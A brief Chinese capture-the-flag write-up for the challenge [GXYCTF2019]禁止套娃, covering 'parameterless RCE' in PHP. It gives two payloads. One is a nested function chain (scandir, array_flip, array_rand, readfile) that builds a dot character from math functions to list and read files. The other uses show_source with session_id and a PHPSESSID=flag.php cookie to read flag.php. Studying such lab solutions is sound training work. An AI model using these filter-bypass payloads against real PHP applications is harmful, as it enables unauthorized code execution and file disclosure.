目錄

• 刷題記錄：[GXYCTF2019]禁止套娃
• 知識點
  • 無參數RCE

刷題記錄：[GXYCTF2019]禁止套娃

題目復現鏈接：https://buuoj.cn/challenges

知識點

無參數RCE

echo(readfile(array_rand(array_flip(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))));
array_rand從數組中隨機取出一個鍵
array_filp交換數組鍵值

或者show_source(session_id(session_start()));
然后加上cookiePHPSESSID=flag.php